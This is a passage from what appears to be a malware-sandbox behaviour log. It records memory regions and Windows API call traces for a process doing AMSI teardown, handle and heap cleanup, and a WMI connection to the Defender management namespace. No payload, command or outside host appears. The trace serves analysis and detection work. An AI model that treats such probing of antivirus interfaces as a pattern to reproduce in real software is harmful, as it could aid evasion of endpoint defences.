"private_0x000000001ac10000" filename = "" Region: id = 3926 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3927 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3928 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3929 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3930 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3931 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3932 start_va = 0x1bab0000 end_va = 0x1babffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bab0000" filename = "" Region: id = 3933 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3934 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3935 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3936 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3937 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3938 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3939 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3940 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3941 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3942 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3943 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3944 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3945 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3946 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3947 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3948 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3949 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3950 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3951 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3952 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3953 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3954 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3955 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3956 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3957 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3958 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3959 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3960 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3961 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3962 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3963 start_va = 0x1b8f0000 end_va = 0x1b8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8f0000" filename = "" Region: id = 3964 start_va = 0x1b900000 end_va = 0x1b90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b900000" filename = "" Region: id = 3965 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3966 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3967 start_va = 0x1b8f0000 end_va = 0x1b92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8f0000" filename = "" Region: id = 3968 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3969 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3970 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3971 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3972 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3973 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3974 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3975 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3976 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3977 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3978 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3979 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3980 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3981 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3982 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3983 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3984 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3985 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3986 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3987 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3988 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3989 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3990 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3991 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3992 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3993 start_va = 0x1bab0000 end_va = 0x1babffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bab0000" filename = "" Region: id = 3994 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3995 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3996 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3997 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3998 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3999 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Thread: id = 274 os_tid = 0x14fc [0352.190] AmsiCloseSession () returned 0x7fffb444c2b0 [0352.190] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7cc [0352.190] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x898 [0352.190] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5dc [0352.190] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5d8 [0352.190] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x620 [0352.190] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x60c [0352.190] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x618 [0352.190] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x630 [0352.190] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5fc [0352.190] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x62c [0352.190] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x628 [0352.190] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x624 [0352.191] SetEvent (hEvent=0x5d8) returned 1 [0352.191] SetEvent (hEvent=0x7cc) returned 1 [0352.191] SetEvent (hEvent=0x898) returned 1 [0352.191] SetEvent (hEvent=0x5dc) returned 1 [0352.191] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x634 [0352.191] SetEvent (hEvent=0x710) returned 1 [0352.198] SetEvent (hEvent=0x620) returned 1 [0352.198] SetEvent (hEvent=0x60c) returned 1 [0352.198] SetEvent (hEvent=0x618) returned 1 [0352.207] AmsiCloseSession () returned 0x7fffb444c2b0 [0352.208] AmsiUninitialize () returned 0x1 [0352.253] CoCreateGuid (in: pguid=0xccb88 | out: pguid=0xccb88*(Data1=0xb61ae5fd, Data2=0x2385, Data3=0x4886, Data4=([0]=0xb8, [1]=0xe0, [2]=0xcf, [3]=0xee, [4]=0x5f, [5]=0xd1, [6]=0xb7, [7]=0x8d))) returned 0x0 [0352.256] ReportEventW (hEventLog=0x1a7cf1d0, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2711500*="Stopped", lpRawData=0x2711368) returned 1 [0352.260] SetEvent (hEvent=0x710) returned 1 [0352.268] CloseHandle (hObject=0x710) returned 1 [0352.268] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0352.272] CoGetContextToken (in: pToken=0xcf930 | out: pToken=0xcf930) returned 0x0 [0352.272] CObjectContext::QueryInterface () returned 0x0 [0352.272] CObjectContext::GetCurrentThreadType () returned 0x0 [0352.272] Release () returned 0x0 [0352.299] CoGetContextToken (in: pToken=0xcf3e0 | out: pToken=0xcf3e0) returned 0x0 [0352.299] CObjectContext::QueryInterface () returned 0x0 [0352.299] CObjectContext::GetCurrentThreadType () returned 0x0 [0352.299] Release () returned 0x0 [0352.307] CoGetContextToken (in: pToken=0xcf3e0 | out: pToken=0xcf3e0) returned 0x0 [0352.307] CObjectContext::QueryInterface () returned 0x0 [0352.307] CObjectContext::GetCurrentThreadType () returned 0x0 [0352.307] Release () returned 0x0 [0352.334] CoGetContextToken (in: pToken=0xcf3e0 | out: pToken=0xcf3e0) returned 0x0 [0352.334] CObjectContext::QueryInterface () returned 0x0 [0352.334] CObjectContext::GetCurrentThreadType () returned 0x0 [0352.334] Release () returned 0x0 [0352.384] CoGetContextToken (in: pToken=0xcf400 | out: pToken=0xcf400) returned 0x0 [0352.385] CObjectContext::QueryInterface () returned 0x0 [0352.385] CObjectContext::GetCurrentThreadType () returned 0x0 [0352.385] Release () returned 0x0 [0352.385] CoUninitialize () [0352.388] free (_Block=0x6fbff0) Thread: id = 281 os_tid = 0x370 Thread: id = 282 os_tid = 0x1534 Thread: id = 283 os_tid = 0xc30 [0332.883] CertFreeCertificateContext (pCertContext=0x1a852470) returned 1 [0332.884] RegCloseKey (hKey=0x70c) returned 0x0 [0332.884] CertFreeCertificateContext (pCertContext=0x1a851d70) returned 1 [0332.884] CertFreeCertificateContext (pCertContext=0x1a852570) returned 1 [0332.884] CertFreeCertificateContext (pCertContext=0x1a851cf0) returned 1 [0337.631] CertFreeCertificateContext (pCertContext=0x1a8525f0) returned 1 [0337.631] CertFreeCertificateContext (pCertContext=0x1a852270) returned 1 [0338.973] CertFreeCertificateContext (pCertContext=0x1a852570) returned 1 [0338.981] CertFreeCertificateContext (pCertContext=0x1a852870) returned 1 [0340.410] CertFreeCertificateContext (pCertContext=0x1b662970) returned 1 [0340.411] CertFreeCertificateContext (pCertContext=0x1b6621f0) returned 1 [0340.411] CertFreeCertificateContext (pCertContext=0x1b662df0) returned 1 [0340.411] CertFreeCertificateContext (pCertContext=0x1b662a70) returned 1 [0340.412] CertFreeCertificateContext (pCertContext=0x1b662170) returned 1 [0340.412] CertFreeCertificateContext (pCertContext=0x1b663af0) returned 1 [0340.412] CertFreeCertificateContext (pCertContext=0x1b661d70) returned 1 [0340.412] CertFreeCertificateContext (pCertContext=0x1b662270) returned 1 [0340.412] CertFreeCertificateContext (pCertContext=0x1b6626f0) returned 1 [0340.412] CertFreeCertificateContext (pCertContext=0x1b6620f0) returned 1 [0349.409] free (_Block=0x6f6220) [0351.574] CloseHandle (hObject=0x5d8) returned 1 [0351.574] CloseHandle (hObject=0x5dc) returned 1 [0352.299] EtwEventUnregister () returned 0x0 [0352.299] EtwEventUnregister () returned 0x0 [0352.299] EtwEventUnregister () returned 0x0 [0352.299] EtwEventUnregister () returned 0x0 [0352.300] EtwEventUnregister () returned 0x0 [0352.300] EtwEventUnregister () returned 0x0 [0352.300] EtwEventUnregister () returned 0x0 [0352.303] LocalFree (hMem=0x1a895380) returned 0x0 [0352.303] LocalFree (hMem=0x1a8949f0) returned 0x0 [0352.304] GetModuleHandleA (lpModuleName="kernelbase.dll") returned 0x7fffca790000 [0352.304] GetProcAddress (hModule=0x7fffca790000, lpProcName="DecodePointer") returned 0x7fffcca9c8b0 [0352.305] LocalFree (hMem=0x1a895490) returned 0x0 [0352.305] MI_Helpers_SetClrIsShuttingDown () returned 0x0 [0352.310] EtwEventUnregister () returned 0x0 [0352.315] CloseHandle (hObject=0x660) returned 1 [0352.333] DeregisterEventSource (hEventLog=0x1a7cf1d0) returned 1 [0352.350] MI_ApplicationWrapper_SetAppDomainIsUnloading () returned 0x0 [0352.351] MI_ApplicationWrapper_ScheduleCleanupCallback () returned 0x3 [0352.351] CloseHandle (hObject=0x7bc) returned 1 [0352.351] CloseHandle (hObject=0x7b8) returned 1 [0352.353] CloseHandle (hObject=0x79c) returned 1 [0352.353] CloseHandle (hObject=0x618) returned 1 [0352.353] CloseHandle (hObject=0x60c) returned 1 [0352.354] CloseHandle (hObject=0x620) returned 1 [0352.354] CloseHandle (hObject=0x5d8) returned 1 [0352.354] CloseHandle (hObject=0x5e4) returned 1 [0352.355] CloseHandle (hObject=0x5dc) returned 1 [0352.355] CloseHandle (hObject=0x898) returned 1 [0352.356] CloseHandle (hObject=0x7cc) returned 1 [0352.356] CloseHandle (hObject=0x634) returned 1 [0352.357] CloseHandle (hObject=0x624) returned 1 [0352.357] CloseHandle (hObject=0x794) returned 1 [0352.358] CloseHandle (hObject=0x628) returned 1 [0352.358] CloseHandle (hObject=0x61c) returned 1 [0352.358] CloseHandle (hObject=0x708) returned 1 [0352.361] CloseHandle (hObject=0x640) returned 1 [0352.361] CloseHandle (hObject=0x704) returned 1 [0352.361] CloseHandle (hObject=0x700) returned 1 [0352.362] CloseHandle (hObject=0x6fc) returned 1 [0352.363] LocalFree (hMem=0x1a7d79b0) returned 0x0 [0352.363] CloseHandle (hObject=0x6f8) returned 1 [0352.363] CloseHandle (hObject=0x6f4) returned 1 [0352.364] CloseHandle (hObject=0x6f0) returned 1 [0352.364] CloseHandle (hObject=0x6ec) returned 1 [0352.364] CloseHandle (hObject=0x6e8) returned 1 [0352.365] CloseHandle (hObject=0xb8) returned 1 [0352.365] CloseHandle (hObject=0x6e4) returned 1 [0352.365] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0352.366] CloseHandle (hObject=0x6e0) returned 1 [0352.366] CloseHandle (hObject=0x6d8) returned 1 [0352.367] CloseHandle (hObject=0x6ac) returned 1 [0352.367] LocalFree (hMem=0x1a808790) returned 0x0 [0352.368] CloseHandle (hObject=0x62c) returned 1 [0352.368] CloseHandle (hObject=0x7c8) returned 1 [0352.369] UnmapViewOfFile (lpBaseAddress=0x1a690000) returned 1 [0352.369] CloseHandle (hObject=0x5fc) returned 1 [0352.369] CloseHandle (hObject=0x630) returned 1 [0352.370] CloseHandle (hObject=0x7c0) returned 1 [0352.370] malloc (_Size=0x20) returned 0x6fa070 [0352.371] GetCurrentThread () returned 0xfffffffffffffffe [0352.371] MI_Helpers_GetCurrentSecurityToken () returned 0x0 [0352.371] SetThreadToken (Thread=0x1a12f498*=0xfffffffffffffffe, Token=0x0) returned 1 [0352.372] GetAddr_SessionHandle_OnReleaseHandleCompleted () returned 0x7fffbc8d1ed0 [0352.372] PublishDebugMessage () returned 0x1 [0352.372] GetProcessHeap () returned 0x510000 [0352.372] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x1a862780 [0352.372] GetProcessHeap () returned 0x510000 [0352.372] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8a8c50) returned 1 [0352.372] GetProcessHeap () returned 0x510000 [0352.373] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a89fd20) returned 1 [0352.373] GetProcessHeap () returned 0x510000 [0352.373] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1b67bb20) returned 1 [0352.373] GetProcessHeap () returned 0x510000 [0352.374] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1b67d6a0) returned 1 [0352.374] SetEvent (hEvent=0x80c) returned 1 [0352.374] GetProcessHeap () returned 0x510000 [0352.374] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x1a862960 [0352.374] GetProcessHeap () returned 0x510000 [0352.374] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a89fa50) returned 1 [0352.375] GetProcessHeap () returned 0x510000 [0352.376] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1b67d460) returned 1 [0352.376] SetEvent (hEvent=0x80c) returned 1 [0352.376] GetProcessHeap () returned 0x510000 [0352.376] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8a83d0) returned 1 [0352.376] GetProcessHeap () returned 0x510000 [0352.376] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8a87d0) returned 1 [0352.376] GetProcessHeap () returned 0x510000 [0352.377] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a899e40) returned 1 [0352.377] ?DeInitialize@WMISchema@@QEAAJXZ () returned 0x0 [0352.377] ClassCache_Delete () returned 0x0 [0352.377] CloseHandle (hObject=0x808) returned 1 [0352.377] GetProcessHeap () returned 0x510000 [0352.377] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8a8430) returned 1 [0352.377] PublishDebugMessage () returned 0x1 [0352.377] PublishDebugMessage () returned 0x1 [0352.377] GetProcessHeap () returned 0x510000 [0352.378] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8abee0) returned 1 [0352.378] GetProcessHeap () returned 0x510000 [0352.378] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8a8970) returned 1 [0352.378] GetProcessHeap () returned 0x510000 [0352.378] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1b67c560) returned 1 [0352.378] GetProcessHeap () returned 0x510000 [0352.378] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1b67c320) returned 1 [0352.378] ??1WMISchema@@UEAA@XZ () returned 0x0 [0352.378] GetProcessHeap () returned 0x510000 [0352.378] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a7f2f70) returned 1 [0352.378] PublishDebugMessage () returned 0x1 [0352.379] SetThreadToken (Thread=0x1a12f498*=0xfffffffffffffffe, Token=0x0) returned 1 [0352.379] CloseHandle (hObject=0x7dc) returned 1 [0352.383] CoGetContextToken (in: pToken=0x1a12f3e0 | out: pToken=0x1a12f3e0) returned 0x0 [0352.383] CoGetContextToken (in: pToken=0x1a12f2d0 | out: pToken=0x1a12f2d0) returned 0x0 [0352.384] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x2 [0352.384] Release () returned 0x1 Thread: id = 284 os_tid = 0xc78 Thread: id = 285 os_tid = 0xdf8 [0345.391] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x7fffbdc39d10, phModule=0x1a56fbe8 | out: phModule=0x1a56fbe8*=0x7fffbdc30000) returned 1 [0345.391] TpCallbackUnloadDllOnCompletion () returned 0x7fffbdc2ffff [0345.392] PublishDebugMessage () returned 0x1 [0345.392] GetCurrentThreadId () returned 0xdf8 [0345.392] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0345.393] GetCurrentThreadId () returned 0xdf8 [0345.393] GetProcessHeap () returned 0x510000 [0345.393] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x28) returned 0x1a8aaad0 [0345.393] PublishDebugMessage () returned 0x1 [0345.393] CoCreateInstance (in: rclsid=0x7fffbdc55448*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fffbdc55468*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1a56f8d0 | out: ppv=0x1a56f8d0*=0x1a8a8af0) returned 0x0 [0345.429] WbemLocator:IUnknown:AddRef (This=0x1a8a8af0) returned 0x2 [0345.429] WbemLocator:IUnknown:AddRef (This=0x1a8a8af0) returned 0x3 [0345.429] WbemLocator:IUnknown:Release (This=0x1a8a8af0) returned 0x2 [0345.429] GetProcessHeap () returned 0x510000 [0345.429] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x1a89edd0 [0345.430] LocaleNameToLCID (lpName="en-US", dwFlags=0x0) returned 0x409 [0345.430] _vsnwprintf (in: _Buffer=0x1a56fa08, _BufferCount=0x9, _Format="MS_%x", _ArgList=0x1a56f8e8 | out: _Buffer="MS_409") returned 6 [0345.430] SetThreadToken (Thread=0x0, Token=0x808) returned 1 [0345.430] GetCurrentThreadId () returned 0xdf8 [0345.430] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1a8a8af0, strNetworkResource="root/Microsoft/Windows/Defender", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1a56f968 | out: ppNamespace=0x1a56f968*=0x1b66e0c0) returned 0x0 [0346.975] CoSetProxyBlanket (pProxy=0x1b66e0c0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0xffffffff, pServerPrincName=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x40) returned 0x0 [0346.976] GetProcessHeap () returned 0x510000 [0346.976] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x1a89fd20 [0346.976] GetProcessHeap () returned 0x510000 [0346.976] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x30) returned 0x1b67bb20 [0346.976] WbemLocator:IUnknown:AddRef (This=0x1b66e0c0) returned 0x2 [0346.976] GetProcessHeap () returned 0x510000 [0346.976] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a89edd0) returned 1 [0346.977] PublishDebugMessage () returned 0x1 [0346.977] WbemLocator:IUnknown:Release (This=0x1a8a8af0) returned 0x1 [0346.977] CoCreateInstance (in: rclsid=0x7fffbdc55498*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fffbdc554a8*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x1a7c5078 | out: ppv=0x1a7c5078*=0x1a832a80) returned 0x0 [0346.980] OperationOptions_CopyOptions () returned 0x0 [0346.983] ResolveDelayLoadedAPI () returned 0x7fffcb3eb0f0 [0346.984] WbemContext:IWbemContext:SetValue (This=0x1a832a80, wszName="__MI_OPERATIONOPTIONS_CLIENTIDENTITY", lFlags=0, pValue=0x1a56fa68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WMIDCOM", varVal2=0x0)) returned 0x0 [0346.984] OptionsValueToContextValue () returned 0x0 [0346.984] OptionsValueToContextValue () returned 0x0 [0346.984] WbemContext:IWbemContext:SetValue (This=0x1a832a80, wszName="__MI_CallbackRegistration", lFlags=0, pValue=0x1a56fa78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1f, varVal2=0x0)) returned 0x0 [0346.985] SetCorrelationIdToWbemContext () returned 0x0 [0346.985] PublishDebugMessage () returned 0x1 [0346.985] CContextSwitcher::ContextCallback () returned 0x0 [0346.985] GetProcessHeap () returned 0x510000 [0346.985] RtlAllocateHeap 